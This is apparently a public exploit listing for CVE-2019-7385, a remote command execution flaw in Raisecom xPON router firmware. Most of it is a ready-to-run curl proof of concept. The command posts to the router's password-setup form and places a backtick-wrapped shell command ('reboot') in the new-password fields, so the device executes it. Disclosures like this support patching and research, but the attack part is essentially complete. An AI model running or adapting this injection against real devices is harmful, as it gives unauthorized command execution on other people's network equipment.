19 lines
No EOL
828 B
Text
19 lines
No EOL
828 B
Text
# Exploit Title: Remote code execution in Raisecom xpon
|
|
# Date: 03/03/2019
|
|
# Exploit Author: JameelNabbo
|
|
# Website: Ordina.nl
|
|
# Vendor Homepage: https://www.raisecom.com
|
|
# Software Link: https://www.raisecom.com/products/xpon
|
|
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
|
|
# Tested on: MacOSX
|
|
# CVE-2019-7385
|
|
|
|
POC:
|
|
curl -i -s -k -X 'POST' \
|
|
-H 'Origin: http://127.0.0.1' -H -H 'Content-Type:
|
|
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
|
|
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
|
|
--data-binary
|
|
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
|
|
\
|
|
'http://192.168.1.1/boaform/formPasswordSetup' |